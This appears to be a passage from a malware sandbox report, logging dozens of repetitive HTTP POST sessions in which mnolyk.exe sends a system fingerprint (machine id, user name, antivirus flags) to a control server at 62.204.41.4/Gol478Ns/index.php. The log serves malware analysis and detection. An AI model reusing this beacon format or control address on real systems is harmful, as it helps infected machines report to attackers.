                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:03.501296043 CET759INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            572192.168.2.45026762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:03.678070068 CET760OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:03.740642071 CET760INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            573192.168.2.45026862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:03.929436922 CET761OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:03.995546103 CET761INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            574192.168.2.45026962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:04.215306997 CET762OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:04.277790070 CET762INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            575192.168.2.45027062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:04.450423956 CET763OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:04.513201952 CET763INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            576192.168.2.45027162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:04.731946945 CET764OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:04.795159101 CET764INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            577192.168.2.45027262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:04.969177008 CET765OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:05.031811953 CET765INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            578192.168.2.45027362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:05.210079908 CET766OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:05.275161028 CET766INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            579192.168.2.45027462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:05.455950975 CET767OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:05.521435976 CET767INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            58192.168.2.44975362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:40.932450056 CET247OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:40.996359110 CET247INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            580192.168.2.45027562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:05.702719927 CET768OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:05.766417027 CET768INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            581192.168.2.45027662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:05.953011036 CET769OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:06.018656015 CET769INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            582192.168.2.45027762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:06.202208996 CET770OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:06.266885996 CET770INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            583192.168.2.45027862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:06.451503038 CET771OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:06.516295910 CET771INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            584192.168.2.45027962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:06.686450005 CET772OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:06.750437021 CET772INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            585192.168.2.45028062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:06.937119961 CET773OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:07.001773119 CET773INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            586192.168.2.45028162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:07.173250914 CET774OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:07.238677025 CET774INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            587192.168.2.45028262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:07.406028986 CET775OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:07.471127033 CET775INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            588192.168.2.45028362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:07.638780117 CET776OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:07.703903913 CET776INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            589192.168.2.45028462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:07.872772932 CET777OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:07.935564041 CET777INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            59192.168.2.44975462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:41.168560982 CET248OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:41.236617088 CET248INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            590192.168.2.45028562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:08.115127087 CET778OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
